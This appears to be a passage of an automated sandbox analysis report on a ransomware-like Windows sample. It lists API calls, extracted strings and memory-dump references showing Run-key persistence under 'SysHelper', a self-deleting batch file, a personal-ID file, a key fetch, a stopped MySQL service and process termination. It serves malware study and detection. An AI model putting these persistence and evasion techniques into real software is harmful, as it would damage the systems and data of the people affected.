                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Crypt$ContextDestroyHashRelease
                                                                                                  • String ID:
                                                                                                  • API String ID: 3989222877-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • CryptDestroyHash.ADVAPI32(?), ref: 0040EA69
                                                                                                  • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040EA79
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Crypt$ContextDestroyHashRelease
                                                                                                  • String ID:
                                                                                                  • API String ID: 3989222877-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • CryptDestroyHash.ADVAPI32(?), ref: 0040EC80
                                                                                                  • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040EC90
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Crypt$ContextDestroyHashRelease
                                                                                                  • String ID:
                                                                                                  • API String ID: 3989222877-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
                                                                                                  • GetLastError.KERNEL32 ref: 00412509
                                                                                                  • CloseHandle.KERNEL32 ref: 0041251C
                                                                                                  • CloseHandle.KERNEL32 ref: 00412539
                                                                                                  • CreateMutexA.KERNEL32(00000000,00000000,{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}), ref: 00412550
                                                                                                  • GetLastError.KERNEL32 ref: 0041255B
                                                                                                  • CloseHandle.KERNEL32 ref: 0041256E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CloseHandle$CreateErrorLastMutex
                                                                                                  • String ID: "if exist "$" goto try$@echo off:trydel "$D$TEMP$del "$delself.bat${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
                                                                                                  • API String ID: 2372642624-488272950
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _strncmp
                                                                                                  • String ID: $-----$-----BEGIN $-----END $.\crypto\pem\pem_lib.c
                                                                                                  • API String ID: 909875538-2733969777
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                                                                                                  • String ID:
                                                                                                  • API String ID: 1503006713-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • PostQuitMessage.USER32(00000000), ref: 0041BB49
                                                                                                  • DefWindowProcW.USER32(?,?,?,?), ref: 0041BBBA
                                                                                                  • _malloc.LIBCMT ref: 0041BBE4
                                                                                                  • GetComputerNameW.KERNEL32(00000000,?), ref: 0041BBF4
                                                                                                  • _free.LIBCMT ref: 0041BCD7
                                                                                                    • Part of subcall function 00411CD0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
                                                                                                    • Part of subcall function 00411CD0: _memset.LIBCMT ref: 00411D3B
                                                                                                    • Part of subcall function 00411CD0: RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
                                                                                                    • Part of subcall function 00411CD0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
                                                                                                    • Part of subcall function 00411CD0: lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
                                                                                                    • Part of subcall function 00411CD0: PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48
                                                                                                  • IsWindow.USER32(?), ref: 0041BF69
                                                                                                  • DestroyWindow.USER32(?), ref: 0041BF7B
                                                                                                  • DefWindowProcW.USER32(?,00008003,?,?), ref: 0041BFA8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Similarity
                                                                                                  • API ID: Window$Proc$CloseComputerDestroyExistsFileMessageNameOpenPathPostQueryQuitValue_free_malloc_memsetlstrlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 3873257347-0

                                                                                                  APIs
                                                                                                  • DecodePointer.KERNEL32 ref: 00427B29
                                                                                                  • _free.LIBCMT ref: 00427B42
                                                                                                    • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
                                                                                                    • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                                                                                                  • _free.LIBCMT ref: 00427B55
                                                                                                  • _free.LIBCMT ref: 00427B73
                                                                                                  • _free.LIBCMT ref: 00427B85
                                                                                                  • _free.LIBCMT ref: 00427B96
                                                                                                  • _free.LIBCMT ref: 00427BA1
                                                                                                  • _free.LIBCMT ref: 00427BC5
                                                                                                  • EncodePointer.KERNEL32(008B5208), ref: 00427BCC
                                                                                                  • _free.LIBCMT ref: 00427BE1
                                                                                                  • _free.LIBCMT ref: 00427BF7
                                                                                                  • _free.LIBCMT ref: 00427C1F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Similarity
                                                                                                  • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 3064303923-0

                                                                                                  APIs
                                                                                                  • CoInitialize.OLE32(00000000), ref: 00411BB0
                                                                                                  • CoCreateInstance.OLE32(004CE908,00000000,00000001,004CD568,00000000), ref: 00411BC8
                                                                                                  • CoUninitialize.OLE32 ref: 00411BD0
                                                                                                  • SHGetSpecialFolderLocation.SHELL32(00000000,00000007,?), ref: 00411C12
                                                                                                  • SHGetPathFromIDListW.SHELL32(?,?), ref: 00411C22
                                                                                                  • lstrcatW.KERNEL32(?,00500050), ref: 00411C3A
                                                                                                  • lstrcatW.KERNEL32(?), ref: 00411C44
                                                                                                  • GetSystemDirectoryW.KERNEL32(?,00000100), ref: 00411C68
                                                                                                  • lstrcatW.KERNEL32(?,\shell32.dll), ref: 00411C7A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Similarity
                                                                                                  • API ID: lstrcat$CreateDirectoryFolderFromInitializeInstanceListLocationPathSpecialSystemUninitialize
                                                                                                  • String ID: \shell32.dll
                                                                                                  • API String ID: 679253221-3783449302

                                                                                                  APIs
                                                                                                  • GetModuleHandleA.KERNEL32(?,?,00000001,?,00454B72), ref: 004549C7
                                                                                                  • GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
                                                                                                  • GetDesktopWindow.USER32 ref: 004549FB
                                                                                                  • GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
                                                                                                  • GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
                                                                                                  • GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
                                                                                                  • GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
                                                                                                  • _wcsstr.LIBCMT ref: 00454A8A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Similarity
                                                                                                  • API ID: InformationObjectUserWindow$AddressDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                                  • String ID: Service-0x$_OPENSSL_isservice
                                                                                                  • API String ID: 2112994598-1672312481

                                                                                                  APIs
                                                                                                  • GetStdHandle.KERNEL32(000000F4,00454C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,0045480E,.\crypto\cryptlib.c,00000253,pointer != NULL,?,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454AFA
                                                                                                  • GetFileType.KERNEL32(00000000,?,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454B05
                                                                                                  • __vfwprintf_p.LIBCMT ref: 00454B27
                                                                                                    • Part of subcall function 0042BDCC: _vfprintf_helper.LIBCMT ref: 0042BDDF
                                                                                                  • vswprintf.LIBCMT ref: 00454B5D
                                                                                                  • RegisterEventSourceA.ADVAPI32(00000000,OPENSSL), ref: 00454B7E
                                                                                                  • ReportEventA.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 00454BA2
                                                                                                  • DeregisterEventSource.ADVAPI32(00000000), ref: 00454BA9
                                                                                                  • MessageBoxA.USER32(00000000,?,OpenSSL: FATAL,00000010), ref: 00454BD3
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Similarity
                                                                                                  • API ID: Event$Source$DeregisterFileHandleMessageRegisterReportType__vfwprintf_p_vfprintf_helpervswprintf
                                                                                                  • String ID: OPENSSL$OpenSSL: FATAL
                                                                                                  • API String ID: 277090408-1348657634

                                                                                                  APIs
                                                                                                  • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00412389
                                                                                                  • _memset.LIBCMT ref: 004123B6
                                                                                                  • RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,00000001,?,00000400), ref: 004123DE
                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 004123E7
                                                                                                  • GetCommandLineW.KERNEL32 ref: 004123F4
                                                                                                  • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 004123FF
                                                                                                  • lstrcpyW.KERNEL32(?,00000000), ref: 0041240E
                                                                                                  • lstrcmpW.KERNEL32(?,?), ref: 00412422
                                                                                                  Strings
                                                                                                  • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 0041237F
                                                                                                  • SysHelper, xrefs: 004123D6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Similarity
                                                                                                  • API ID: CommandLine$ArgvCloseOpenQueryValue_memsetlstrcmplstrcpy
                                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Run$SysHelper
                                                                                                  • API String ID: 122392481-4165002228

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Similarity
                                                                                                  • API ID: _memmove
                                                                                                  • String ID: invalid string position$string too long
                                                                                                  • API String ID: 4104443479-4289949731

                                                                                                  APIs
                                                                                                  • CoInitialize.OLE32(00000000), ref: 0040DAEB
                                                                                                  • CoCreateInstance.OLE32(004D4F6C,00000000,00000001,004D4F3C,?,?,004CA948,000000FF), ref: 0040DB0B
                                                                                                  • lstrcpyW.KERNEL32(?,?), ref: 0040DBD6
                                                                                                  • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,004CA948,000000FF), ref: 0040DBE3
                                                                                                  • _memset.LIBCMT ref: 0040DC38
                                                                                                  • CoUninitialize.OLE32 ref: 0040DC92
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Similarity
                                                                                                  • API ID: CreateFileInitializeInstancePathRemoveSpecUninitialize_memsetlstrcpy
                                                                                                  • String ID: --Task$Comment$Time Trigger Task
                                                                                                  • API String ID: 330603062-1376107329
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 00411A1D
                                                                                                  • OpenServiceW.ADVAPI32(00000000,MYSQL,00000020), ref: 00411A32
                                                                                                  • ControlService.ADVAPI32(00000000,00000001,?), ref: 00411A46
                                                                                                  • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A5B
                                                                                                  • Sleep.KERNEL32(?), ref: 00411A75
                                                                                                  • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A80
                                                                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 00411A9E
                                                                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 00411AA1
                                                                                                  Similarity
                                                                                                  • API ID: Service$CloseHandleOpenQueryStatus$ControlManagerSleep
                                                                                                  • String ID: MYSQL
                                                                                                  • API String ID: 2359367111-1651825290
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • std::exception::exception.LIBCMT ref: 0044F27F
                                                                                                    • Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0044F294
                                                                                                    • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                                  • std::exception::exception.LIBCMT ref: 0044F2AD
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0044F2C2
                                                                                                  • std::regex_error::regex_error.LIBCPMT ref: 0044F2D4
                                                                                                    • Part of subcall function 0044EF74: std::exception::exception.LIBCMT ref: 0044EF8E
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0044F2E2
                                                                                                  • std::exception::exception.LIBCMT ref: 0044F2FB
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0044F310
                                                                                                  Similarity
                                                                                                  • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_std::regex_error::regex_error
                                                                                                  • String ID: bad function call
                                                                                                  • API String ID: 2464034642-3612616537
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,?,?,00000000), ref: 004654C8
                                                                                                  • GetLastError.KERNEL32(?,?,00000000), ref: 004654D4
                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,00000000), ref: 004654F7
                                                                                                  • GetLastError.KERNEL32(?,?,00000000), ref: 00465503
                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,?,00000000,?,?,00000000), ref: 00465531
                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,00000008,?,00000000,?,?,00000000), ref: 0046555B
                                                                                                  • GetLastError.KERNEL32(.\crypto\bio\bss_file.c,000000A9,?,00000000,?,?,00000000), ref: 004655F5
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharMultiWide$ErrorLast
                                                                                                  • String ID: ','$.\crypto\bio\bss_file.c$fopen('
                                                                                                  • API String ID: 1717984340-2085858615
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__wsetlocale_nolock
                                                                                                  • String ID:
                                                                                                  • API String ID: 790675137-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                    • Part of subcall function 00420FDD: __wfsopen.LIBCMT ref: 00420FE8
                                                                                                  • _fgetws.LIBCMT ref: 0040C7BC
                                                                                                  • _memmove.LIBCMT ref: 0040C89F
                                                                                                  • CreateDirectoryW.KERNEL32(C:\SystemID,00000000), ref: 0040C94B
                                                                                                  Similarity
                                                                                                  • API ID: CreateDirectory__wfsopen_fgetws_memmove
                                                                                                  • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                                  • API String ID: 2864494435-54166481
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 0041244F
                                                                                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00412469
                                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004124A1
                                                                                                  • TerminateProcess.KERNEL32(00000000,00000009), ref: 004124B0
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004124B7
                                                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 004124C1
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004124CD
                                                                                                  Similarity
                                                                                                  • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                                                                                  • String ID: cmd.exe
                                                                                                  • API String ID: 2696918072-723907552
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • LoadLibraryW.KERNEL32(Shell32.dll), ref: 0040F338
                                                                                                  • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 0040F353
                                                                                                  Similarity
                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                  • String ID: SHGetFolderPathW$Shell32.dll$\
                                                                                                  • API String ID: 2574300362-2555811374
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: _malloc$__except_handler4_fprintf
                                                                                                  • String ID: &#160;$Error encrypting message: %s$\\n
                                                                                                  • API String ID: 1783060780-3771355929
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: _strncmp
                                                                                                  • String ID: .\crypto\pem\pem_lib.c$DEK-Info: $ENCRYPTED$Proc-Type:
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,?), ref: 0040C6C2
                                                                                                  • RegQueryValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,?), ref: 0040C6F3
                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0040C700
                                                                                                  • RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,00000004), ref: 0040C725
                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0040C72E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CloseValue$OpenQuery
                                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion$SysHelper
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • _memset.LIBCMT ref: 0041E707
                                                                                                    • Part of subcall function 0040C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C51B
                                                                                                  • InternetOpenW.WININET ref: 0041E743
                                                                                                  • _wcsstr.LIBCMT ref: 0041E7AE
                                                                                                  • _memmove.LIBCMT ref: 0041E838
                                                                                                  • lstrcpyW.KERNEL32(?,?), ref: 0041E90A
                                                                                                  • lstrcatW.KERNEL32(?,&first=false), ref: 0041E93D
                                                                                                  • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0041E954
                                                                                                  • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0041E96F
                                                                                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041E98C
                                                                                                  • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041E9A3
                                                                                                  • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 0041E9CD
                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0041E9F3
                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0041E9F6
                                                                                                  • _strstr.LIBCMT ref: 0041EA36
                                                                                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EA59
                                                                                                  • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EA74
                                                                                                  • DeleteFileA.KERNEL32(?), ref: 0041EA82
                                                                                                  • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 0041EA92
                                                                                                  • lstrcpyA.KERNEL32(?,?), ref: 0041EAA4
                                                                                                  • lstrcpyA.KERNEL32(?,?), ref: 0041EABA
                                                                                                  • lstrlenA.KERNEL32(?), ref: 0041EAC8
                                                                                                  • lstrlenA.KERNEL32(00000022), ref: 0041EAE3
                                                                                                  • lstrcpyW.KERNEL32(?,00000000), ref: 0041EB5B
                                                                                                  • lstrlenA.KERNEL32(?), ref: 0041EB7C
                                                                                                  • _malloc.LIBCMT ref: 0041EB86
                                                                                                  • _memset.LIBCMT ref: 0041EB94
                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 0041EBAE
                                                                                                  • lstrcpyW.KERNEL32(?,00000000), ref: 0041EBB6
                                                                                                  • _strstr.LIBCMT ref: 0041EBDA
                                                                                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EC00
                                                                                                  • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EC24
                                                                                                  • DeleteFileA.KERNEL32(?), ref: 0041EC32
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Path$Internetlstrcpylstrlen$Folder$AppendFile$CloseDeleteHandleOpen_memset_strstr$ByteCharMultiReadWide_malloc_memmove_wcsstrlstrcat
                                                                                                  • String ID: bowsakkdestx.txt${"public_key":"
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __aulldvrm
                                                                                                  • String ID: $+$0123456789ABCDEF$0123456789abcdef$UlE
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • ___unDName.LIBCMT ref: 0043071B
                                                                                                  • _strlen.LIBCMT ref: 0043072E
                                                                                                  • __lock.LIBCMT ref: 0043074A
                                                                                                  • _malloc.LIBCMT ref: 0043075C
                                                                                                  • _malloc.LIBCMT ref: 0043076D
                                                                                                  • _free.LIBCMT ref: 004307B6
                                                                                                    • Part of subcall function 004242FD: IsProcessorFeaturePresent.KERNEL32(00000017,004242D1,i;B,?,?,00420CE9,0042520D,?,004242DE,00000000,00000000,00000000,00000000,00000000,0042981C), ref: 004242FF
                                                                                                  • _free.LIBCMT ref: 004307AF
                                                                                                    • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
                                                                                                    • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                                                                                                  Memory Dump Source
